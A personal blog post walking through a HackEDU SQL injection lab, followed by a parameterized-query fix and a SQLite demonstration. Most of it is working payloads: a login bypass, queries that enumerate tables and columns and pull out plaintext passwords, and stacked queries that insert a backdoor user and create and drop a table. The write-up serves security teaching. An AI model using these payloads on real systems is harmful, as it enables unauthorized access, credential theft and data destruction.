SQL injection:

Below is a walkthrough of the HackEDU SQL injection tutorial:

The link to the HackEDU lab:

Enter the value below in both the username and password fields. The single quote closes the string literal the application builds around the input, and the trailing or'1=1 makes the WHERE clause true for every row:

x'or'1=1

That logs us in as some user. The next question is how to read the admin usernames and passwords out of the database. After login we land on the page shown below:

Now let us look at the POST request that is sent when a post is updated.

If the username contains a quotation mark the server returns an internal server error, so first try a plain value without quotes, such as x.

As we can see, the request carries the username and the update text. Try sending the following as the username in the POST request:

User_name', (SELECT database()))#

Answer is: SocialMediaApp: User_name (the database name is reflected back in the stored post)

User_name', (SELECT table_name FROM information_schema.tables where table_schema='SocialMediaApp' LIMIT 1))#

Answer is:

tbl_update: a

a', (SELECT table_name FROM information_schema.tables where table_schema='SocialMediaApp' LIMIT 1 OFFSET 1))#

Answer is:

tbl_user: a

a', (SELECT table_name FROM information_schema.tables where table_schema='SocialMediaApp' LIMIT 1 OFFSET 2))#

Answer is:

None: a

This means there are no more tables. Next we list the column names of a table.

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1))#

Answer is: user_id: padma

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1 OFFSET 1))#

Answer is: user_username: padma

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1 OFFSET 2))#

Answer is:

user_password: padma

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1 OFFSET 3))#

Answer is: None: padma

This means there are no more columns in the table. With the column names known, we now retrieve the data.

First we retrieve the user_id and user_username data:

padma', (SELECT user_id FROM tbl_user LIMIT 1))#
padma', (SELECT user_id FROM tbl_user LIMIT 1 OFFSET 1))#
padma', (SELECT user_id FROM tbl_user LIMIT 1 OFFSET 2))#
padma', (SELECT user_id FROM tbl_user LIMIT 1 OFFSET 3))#
padma', (SELECT user_username FROM tbl_user LIMIT 1))#
padma', (SELECT user_username FROM tbl_user LIMIT 1 OFFSET 1))#
padma', (SELECT user_username FROM tbl_user LIMIT 1 OFFSET 2))#
padma', (SELECT user_username FROM tbl_user LIMIT 1 OFFSET 3))#

The answers for the user_id requests are:

16: padma

17: padma

18: padma

None: padma

The answers for usernames:

alice: padma

bob: padma

eve: padma

None: padma

Then we retrieve the passwords with the following requests:

padma', (SELECT user_password FROM tbl_user LIMIT 1))#
padma', (SELECT user_password FROM tbl_user LIMIT 1 OFFSET 1))#
padma', (SELECT user_password FROM tbl_user LIMIT 1 OFFSET 2))#
padma', (SELECT user_password FROM tbl_user LIMIT 1 OFFSET 3))#

The answers for this are:

monkey1: padma

password: padma

password123: padma

None: padma

Now let us try to log in with the recovered credentials:

alice and monkey1

bob and password

eve and password123

Now we try to create a user with username padma and password padma, for persistence, by chaining an INSERT statement onto the original query (a stacked query):

a', '1'); INSERT INTO tbl_user VALUES (19, 'padma','padma')#

To check whether it succeeded, see whether the post was added and then try to log in with padma and padma.

Can we create a table?

a', '1'); create table hacker(hackername varchar(10))#

It got created; can we also drop it?

a', '1'); drop table hacker#

The fix: use parameterized SQL statements instead of concatenating user input into the SQL string.

import os
import pymysql


def login(username, password):
    conn = pymysql.connect(host='mysql', port=3306, user='root', passwd='letmein', db='SocialMediaApp')
    cursor = conn.cursor()

    # Parameterized query: pymysql sends username and password as values,
    # so a quote inside them can never terminate the SQL string literal.
    cursor.execute("SELECT * FROM tbl_user WHERE user_username = %s AND user_password = %s",
                   (username, password))
    data = cursor.fetchall()

    conn.commit()
    cursor.close()
    conn.close()

    # Compare with ==, not 'is': identity comparison against a literal is not reliable.
    if len(data) == 0:
        return False
    return True


def add_post(post, username):
    conn = pymysql.connect(host='mysql', port=3306, user='root', passwd='letmein', db='SocialMediaApp')
    cursor = conn.cursor()

    # Same pattern for the insert: placeholders in the statement, values passed separately.
    statement = "INSERT INTO tbl_update VALUES (%s, %s);"
    params = (post, username)

    cursor.execute(statement, params)
    conn.commit()
    cursor.close()
    conn.close()

The cursor.execute calls above are the patched lines: the statement carries %s placeholders and the user input is passed as a separate tuple.

Now retry the injections above.

As shown below, the payload is now stored as a plain string instead of being executed as SQL.

Preventing SQL injection is straightforward: pass every piece of user input to the database through a parameterized query, never by string concatenation. Note also that the passwords came back in plaintext above; hashing stored passwords would limit the damage of a leak like this one.
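To show why the patched code above neutralises the tutorial's payloads, here is an added example (not from HackEDU or this post) that rebuilds the same two tables in an in-memory SQLite database, assumed to stand in for the MySQL SocialMediaApp schema. It runs the tautology login and the tbl_update payload from the walkthrough against a concatenated query and a parameterized one; SQLite uses ? placeholders where pymysql uses %s, but the behaviour is the same.

```python
import sqlite3

# Tautology payload from the walkthrough; with concatenation it becomes
#   ... WHERE user_username = 'x'or'1=1' AND user_password = 'x'or'1=1'
PAYLOAD = "x'or'1=1"


def build_db():
    """Constructed stand-in for the lab's tables, populated with the rows the walkthrough found."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_user (user_id INTEGER, user_username TEXT, user_password TEXT)")
    conn.execute("CREATE TABLE tbl_update (post TEXT, username TEXT)")
    conn.executemany("INSERT INTO tbl_user VALUES (?, ?, ?)",
                     [(16, "alice", "monkey1"), (17, "bob", "password"), (18, "eve", "password123")])
    conn.commit()
    return conn


def login_unsafe(conn, username, password):
    """The vulnerable pattern: user input pasted into the SQL text."""
    sql = ("SELECT * FROM tbl_user WHERE user_username = '%s' AND user_password = '%s'"
           % (username, password))
    return len(conn.execute(sql).fetchall()) > 0


def login_safe(conn, username, password):
    """The patched pattern: placeholders in the statement, values sent separately."""
    rows = conn.execute(
        "SELECT * FROM tbl_user WHERE user_username = ? AND user_password = ?",
        (username, password)).fetchall()
    return len(rows) > 0


def add_post_safe(conn, post, username):
    """Parameterized insert; returns the stored rows so the effect can be inspected."""
    conn.execute("INSERT INTO tbl_update VALUES (?, ?)", (post, username))
    conn.commit()
    return conn.execute("SELECT post, username FROM tbl_update").fetchall()


if __name__ == "__main__":
    db = build_db()
    print("concatenated login with payload:", login_unsafe(db, PAYLOAD, PAYLOAD))   # True
    print("parameterized login with payload:", login_safe(db, PAYLOAD, PAYLOAD))    # False
    print("parameterized login, real creds:", login_safe(db, "alice", "monkey1"))   # True
    # The tbl_update payload from the walkthrough is stored verbatim, not executed.
    print(add_post_safe(db, "hello", "a', (SELECT database()))#"))
```

The concatenated version accepts the payload because the WHERE clause ends in OR '1=1', which the database evaluates as true; the parameterized version looks for a user literally named x'or'1=1 and finds none.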


I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu
